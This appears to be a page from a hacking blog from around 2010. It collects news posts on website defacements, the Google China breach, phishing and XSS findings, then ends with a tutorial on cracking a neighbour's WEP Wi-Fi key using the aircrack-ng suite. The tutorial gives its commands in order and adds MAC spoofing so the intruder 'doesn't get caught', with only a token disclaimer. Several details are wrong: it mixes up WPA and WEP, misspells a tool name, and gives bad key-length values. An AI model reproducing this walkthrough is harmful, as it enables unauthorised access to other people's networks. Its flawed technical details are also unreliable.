It is not clear why Baidu’s Web site has been attacked.

Twitter was hacked after micro-blogging site was used by the pro-democracy forces in Iran earlier in summer to bring to light the country’s disputed presidential elections that were marred by blood bath.

At that time, when the media had a difficult time covering the elections, the opposition took to Twitter to provide minute by minute update along with videos.

It is likely that the attack on Baidu is the result of severing bilateral ties between the two countries following elections in Iran last year.

Additionally, Chinese Web users have created "CN4Iran", a discussion forum on Twitter, commenting on the situation in Iran and supporting the pro-democracy forces.

The attack, though short-lived, infuriated Chinese Web users.

In retaliation, the hackers in China attacked Web sites registered in Iran, which appeared with Chinese flags and their slogans.

An Iranian Web site, room98.ir, displayed a message by the Honker Union for China, “This morning your Iranian Cyber Army intrusion [sic] our baidu.com.

“Please tell your so-called Iranian Cyber Army: Don't intrusion Chinese website about The United States authorities to intervene the internal affairs of Iran's response. This is a warning!”

The Honker Union for China also posted a slogan on their Website, “We are China's hacker! Let the world hear the voice of China! The state is higher than the dignity of all!"

The Honker Union for China is a group in China that is quite active for hacktivisim. Its members combine hacking skills with patriotism and nationalism.

Over the years, they have launched a series of attacks on websites in the United States, mostly government-related sites.

SOURCE: The Money Times

read more "Iranian Cyber Army hit Baidu, China’s Internet search engine: Chinese hack back"

Google Attacked – May Leave China

A highly targeted attack on Google China and 20 other high profile companies including Adobe Systems has led to a major controversy. The attack that hit Google in mid December originated in China and was targeted to get email credentials of human right activists who are advocates of human rights in China based in Europe,America and China.The attack was discovered as Google uncovered similar attacks on at least 20 other companies in the financial, technology, media, and chemical industries. Adobe Systems issued a separate statement that reported it and other companies had also come under attack. In light of the revelations, Google said it is considering shuttering its Chinese operations altogether.
"These attacks and the surveillance they have uncovered - combined with the attempts over the past year to further limit free speech on the web - have led us to conclude that we should review the feasibility of our business operations in China," Google's chief legal officer David Drummond commented here. "We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all."
The attack resulted into a breach of 2 email accounts,and the company has quoted that no major information except date of account creation and the subject line was compromised rather than the content of email itself.Also the names of 20 companies have also been omitted. Recent attacks on Adobe pdf readers and applications to bind malware code with them has been on rise and the timing of Google’s warning and the official statement of Adobe has led to a speculation that some of attacks may have used the Adobe applications or exploits. Google also mentioned in a separate blog post that servers of companies have not been targeted.
China has been known for its quite controlled internet policies and Chinese hackers have recently gained notoriety along with Russian ones in the scene. With the rising attacks on major companies,lets see what steps silicon giants take to counter it.

update - Google has rolled out the option to use default HTTP access in Gmail due to the attack on Gmail accounts in China. One more step towards security..You can read more about it here

Via The register


PS : Like this article? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.

Technorati Tags: rdhacker,prohack,technology news,cyber crime,google,security,china,russia,hacking,hackers,attacks

read more "Google Attacked – May Leave China"

Learn How to Protect Your Smartphone From Hackers

Hackers are now targeting smartphones with programs to steal your valuable information. Here are some measures to protect yourself.

• First, don't store sensitive information on your phone that can be accessed if it's lost or stolen.
• Smartphones can get viruses, so protect yourself with software to keep them secure.
• If you're using Wi-F in a public place, don't try to access your online bank accounts.
• It is recommend against so-called 'jailbreaking' the Iphone to use third party software. That move disrupts its security measures and leaves it vulnerable to attack.

Click Here for 3 Simple Steps to Hack a Smartphone (Includes Video)

read more "Learn How to Protect Your Smartphone From Hackers"

Google Nexus One Launch – Google Jumps Mobile

Google will be announcing its own smartphone and will finally jump into the mobile computing officially. The smartphone named Nexus One will showcase the latest generation of the Linux-based open source Android operating system and will be directly marketed by Google itself. Designed by HTC it runs Android OS 2.1 which is a step up from older version 2.0.
The Nexus One is powered by a 1-GHz Snapdragon CPU, a 3.7-inch 480 x 800 display,5 Megapixel camera with LED flash, 512 MB of of RAM and an expandable 4-GB microSD card, The 1-GHz processor alone should make the Nexus one of the fastest smartphones available currently and it will have a stiff competition from the product offerings by Apple iPhone,Nokia,Palm and Blackberry.

The Phone will be priced at about

• 530$ Unlocked and
• 180$ subsidized with a contract to commit for 2 years.

With Google jumping up in the mobile market,the biggest loser is Microsoft as HTC used to be its flagship company for its Windows mobile phones, and now its not. Overall,Nexus has less to suggest as a standard and set itself as a benchmark in the market due to the competitive offerings from other smartphone makers,unless Google baffles us with some nice welcoming tricks under its sleeves.

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.Google Blog.

Technorati Tags: cellphones and mobile,consumer,google,microsoft,linux,technology news,rdhacker,prohack,google nexus one,android,smartphone,iphone

read more "Google Nexus One Launch – Google Jumps Mobile"

Official Web site of Iran’s president, Ahmadinejad.ir, got hacked

Monday night in San Francisco, the official Web site of Iran’s president, Ahmadinejad.ir, had been attacked by hackers. Although the Web site appears to be down now, People trying to access it last night were redirected to this page, which contains the following message:

Dear God, In 2009 you took my favorite singer - Michael Jackson, my favorite actress - Farrah Fawcett, my favorite actor - Patrick Swayze, my favorite voice - Neda. Please, please, don’t forget my favorite politician - Ahmadinejad and my favorite dictator - Khamenei in the year 2010. Thank you.

The site was subsequently inaccessible, and speculated that it was “either intentionally pulled or … is simply being overloaded since so many people are looking to grab a peek at the hack.”

The apparent attack comes three weeks after a group calling itself the “Iranian Cyber Army” launched an attack that briefly redirected users of Twitter to a site that displayed a message that seemed to support Iran’s government. That message read, in part:

U.S.A. Think They Controlling And Managing Internet By Their Access, But They Don’t, We Control And Manage Internet By Our Power.

SOURCE: http://blog.austinheap.com

read more "Official Web site of Iran’s president, Ahmadinejad.ir, got hacked"

Spanish Prime Ministers Website Defaced

Visitors of the country’s official website were greeted by the slapstick character Mr Bean as the official website was defaced by malicious hackers.The representative for Spanish Prime Minister Jose Luis Rodriguez Zapatero confirmed the defacement of www.eu2010.es but insisted that the website was never compromised and was left untouched,therefore the act was more or less was a stunt.

The act was done using a Cross-site Scripting attack which injects custom unauthorized content into vulnerable websites.People who tried to visit the PM's site site were briefly met by an image of Mr. Bean actor Rowan Atkinson. Comparisons between the appearance of Spain's leader and the buffoon have been a long-standing joke.

While the hack was relatively harmless XSS, or cross-site scripting holes can be exploited to inject malicious code into visitors' browsers that steal authentication credentials or redirect victims to malicious websites.Recently the frequency of XSS attacks have quite increased and may pose a potential threat to major websites of the world.

 

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

 

POSTED BY XERO ALL RIGHTS RESERVED.

 

Technorati Tags: rdhacker,prohack,technology news,security,news,hacking,css,xss attack,web security,web attacks

read more "Spanish Prime Ministers Website Defaced"

Thousands of income taxpayers received ‘fake’ emails from ‘phishers’ and ‘hackers’

Thousands of income taxpayers were flummoxed by ‘fake’ emails received from ‘phishers’ and ‘hackers’ on Monday seeking their personal and financial details ahead of refunds payment.

Fake mails also lead the taxpayers to links that are mirror images of the income tax (I-T) department’s website and seek sensitive information including bank accounts details, among other financial details. The mails in circulation are regarded by a huge section of I-Tax department as nothing but ‘spam mail’. But, others do see the vulnerability of the I-T department’s large database and its website that links crores of taxpayers, both individual and companies.

Gulshan Rai, director general, CERT-IN at the department of information technology, told Financial Chronicle, “Online security has been a huge concern for the industry. With the growth of websites, emails phishing and hacking has increased to a great extent. We do see a lot of spam emails being circulated for financial gains. We need to educate individuals on online security.”

These emails, which have their origin from a web address not related the I-T department, have led to confusion and anxiety on the security of financial data uploaded by individuals and companies.

But the I-T department has clarified that links with fake mails under circulation only reflect the mirror image of the I-T department's website. The I-T department has maintained that neither the website nor its intra-net data has been either hacked or compromised. The I-T department has also said that it does not send emails on refunds and does not seek any information regarding credit cards of taxpayers. “To create mirror image of a website, there is no need to hack it. The I-T website has not been hacked. We have taken appropriate steps to prevent such incidents,” said Shishir Jha, IT commissioner and spokesperson, central board of direct taxes.

In October, the I-T department received several complaints from taxpayers about phishing. An additional commissioner of the I-T department, who did not wish to be identified, confirmed that the site was hacked in October 2009. Following the incident, the I-T department in a news release, said, “Information has been received from several quarters that people are receiving electronic mail informing them of their income-tax refunds and seeking their credit card details. The email is sent from the following or similar mailing addresses — lhxbkw@ accounts.net or cvhfvs@ accounts.net.”

The department cautioned taxpayers against giving out information on credit cards and accounts details online. Mails received by taxpayers on Monday also originated from similar addresses. Efforts made by FC to contact the director general (systems) at the I-Tax department were unsuccessful. Lakshmi Prasad, in-charge of systems at I-T department was not available for comment.

SOURCE: mydigitalfc

read more "Thousands of income taxpayers received ‘fake’ emails from ‘phishers’ and ‘hackers’"

Vulnerabilities in Twitter and Google Calendar

A security researcher uncovered some holes in Google Calendar and Twitter that may allow an attacker to steal cookies and user session IDs.

A security researcher has uncovered vulnerabilities in Twitter and Google Calendar that could put users at risk.

In a proof of concept, researcher Nir Goldshlager demonstrated cross-site scripting (XSS) vulnerabilities in Google Calendar and Twitter that he said could be used to steal cookies and session IDs. He also uncovered an HTML injection issue affecting Google Calendar as well that he said could be used to redirect a victim to an attack site any time the user viewed his or her Google Calendar agenda events.

"We do not believe this report contains evidence of substantial security issues," a spokesperson for Google said. "Trying to trick someone into copying unfamiliar, suspicious code into a Google Calendar text field is neither a likely attack vector nor one that we are seeing being exploited. ... Nonetheless, we will check the input validation mechanisms in Google Calendar text fields to help prevent any abuse of this capability before an event is sanitized."

According to Goldshlager, a penetration testing expert with Avnet Information Security Consulting in Israel, the cross-site scripting vulnerability can be exploited if a victim adds malicious code to his quick add post calendar.

“When the victim … [adds] this malicious code, his cookies [and] session ID will be stolen and will be sent to the attacker site," he said. "Then the attacker will be able to get full control of the victim’s Google accounts like: Google Calendar account, Google Groups, iGoogle, etc.”

Goldshlager also demonstrated that the HTML injection vulnerability could be used to log a user out of his Google account, something the Google spokesman said “is of negligible security impact” and "can be avoided by not clicking on the link."

"They should fix this immediately because an attacker can redirect a victim to any site that he wants, and [with] the XSS issue an attacker can steal the victim's cookies and get full control of his accounts," the researcher said.

SOURCE: eWeek

read more "Vulnerabilities in Twitter and Google Calendar"

Facebook and Twitter are easy targets for hackers and cybercriminals in 2010

Social networking sites such as Facebook and Twitter would become soft targets for cybercriminals to spoof in 2010.

In its 2010 Threat Predictions report, McAfee forecasts that Microsoft Operating systems have fallen prey to cyber attacks from hackers, but software and social networking sites are likely to be their new target. On the grounds that hackers want to get a sense of wielding far-reaching influence, they tend to be keen on breaking into universal operating systems and software. MS Office applications such as Adobe Flash and Acrobat Reader are expected to be the prey of malware writers. Except for Adobe, Mozilla's Firefox web browser and Apple' QuickTime are also likely to be threatened by cyber criminals.

The computer security company also expects that social networking site such as Twitter and Facebook would become playgrounds for cybercriminals intent on disseminating malware, such as computer viruses and spyware. For Facebook, malware disguised as instant messages from friends and application programs will be the most common form of cyber attack.

David Marcus, McAfee Labs' director of security research and communications, said, "Users of social networking sites often click on messages from friends' and their referrals without suspicion, a practice hacker gleefully takes advantage of this. On Facebook, when users download or open applications, they should take a second look at it, googling more information about them."

SOURCE: Korea IT Times

read more "Facebook and Twitter are easy targets for hackers and cybercriminals in 2010"

Hack Wifi using Backtrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -

• ifconfig

This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.

• airmon-ng

This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range

• airmon-ng stop [Wi-Fi Card name(without the quotes)]

This command will stop the cards broadcast and reception immediately

• macchanger –mac [Desired MAC address] [Wi-Fi card name]

this command will change the current MAC address to any MAC address you desire, so that you don’t get caught later

• airmon-ng start [Wi-Fi Card name]

You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears

DUMPING PACKETS

Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -

• airodump-ng [Wi-Fi card name]

Copy and paste the BSSID in the following command and execute it

• airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]

As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.

SPEEDING UP THINGS

However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it

airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]

As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.

aircrack-ng –n 64 –b [BSSID] [Filename without the extension]  

As you type this command, you will see that a key will appear in front of you in the given below format:

XX:XX:XX:XX

It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:

aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]

Remember, the bit level should be a number of 2ⁿ where n:1,2,3,4…

e.g.

aircrack-ng –n 32 –b [BSSID] [Filename without the extension]

OR

aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.

Now just login using the WEP key you got.

 

Cheers

PS : Like this tutorial ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

 

POSTED BY XERO ALL RIGHTS RESERVED.ANONYMOUS AUTHOR.

Technorati Tags: hacking,linux,security,tutorials,how to,rdhacker,prohack,wifi,wifi hacking,backtrack,wep,wpa,wireless

read more "Hack Wifi using Backtrack"